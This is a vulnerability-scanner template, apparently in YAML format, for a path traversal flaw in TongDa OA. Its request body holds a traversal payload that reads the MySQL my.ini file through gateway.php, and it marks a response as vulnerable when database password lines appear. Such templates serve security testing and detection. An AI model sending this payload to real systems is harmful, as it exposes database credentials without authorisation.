id: oa-tongda-path-traversal
info:
  name: OA TongDa Path Traversal
  risk: High

params:
  - root: "{{.BaseURL}}"

requests:
  - method: POST
    redirect: false
    url: >-
      {{.root}}/ispirit/interface/gateway.php
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
      - Content-Type: application/x-www-form-urlencoded
    body: |
      json={"url":"/general/../../mysql5/my.ini"}
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", "password=") && StringSearch("response", "[mysql]")

references:
  - link: https://github.com/jas502n/OA-tongda-RCE